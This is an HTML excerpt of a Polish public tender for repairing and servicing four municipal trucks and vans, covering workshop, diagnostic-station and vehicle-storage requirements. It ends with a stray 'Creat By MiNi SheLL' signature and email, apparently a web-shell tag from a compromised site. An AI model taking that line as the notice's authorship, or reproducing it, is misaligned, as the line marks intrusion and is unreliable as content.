<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Marka pojazdu	Nr rejestracyjny	Pojemność	Paliwo	Rok Produkcji
1	STAR 1142	ZS 18067	4580	ON	1998
2	FORD TRANSIT VAN	ZS 2421M	2.4	ON	2008
3.	FORD TRANSIT	ZS 0729T	2.4	ON	2010
4	RENAULT	ZS 1927S	4764	ON	2008

1)	Kod CPV : 50.11.40.00 - Usługi w zakresie napraw i konserwacji ciężarówek.
2)	Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie dłuższym niż 5 dni roboczych od daty przekazania pojazdu.
3)	Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
- stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
- co najmniej 1 kanał obsługowy.
4)	Jednocześnie Wykonawca winien dysponować w miejscu świadczenia napraw i obsługi pojazdów stacją diagnostyczną o wyposażeniu zgodnym  z obowiązującymi przepisami. W tym zakresie Wykonawca winien dysponować co najmniej 1 osobą posiadającą uprawnienia diagnosty zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 4 listopada 2004 r. w sprawie szczegółowych wymagań w stosunku do diagnostów (Dz.U.Nr 246 poz. 2469 ze zm.). Stacja kontroli pojazdów, którą dysponuje Wykonawca winna spełniać wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym. 
     Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji przeprowadzającej badania techniczne pojazdów winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
5)	Zamawiający wymaga aby pojazdy oczekujące na naprawę były przechowywane na terenie:
b)	 ogrodzonym, o utwardzonej nawierzchni (poprzez utwardzenie należy rozumieć: wyasfaltowanie, kostka brukowa wybetonowanie, wysypanie żwirem, tłuczniem, itp.),
b)   strzeżonym całodobowo lub monitorowanym za pomocą kamer z możliwością rejestracji zapisu oraz oświetlonym, gwarantującym nienaruszalność pojazdów dla osób postronnych,
c)   powierzchni umożliwiającej jednoczesne przechowanie min.1 pojazdu.
6)   Wykonawca umożliwi Zamawiającemu wgląd do pomieszczeń w celu weryfikacji ww. wymagań w zakresie wymaganego wyposażenia jakie posiada Wykonawca w miejscu wykonywania usług będących przedmiotem zamówienia. Wykonawca, który uniemożliwi Zamawiającemu zweryfikowanie ww. wymagań naruszy SIWZ i na podstawie art. 89 ust.1 pkt 2) ustawy PZP jego oferta zostanie odrzucona..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com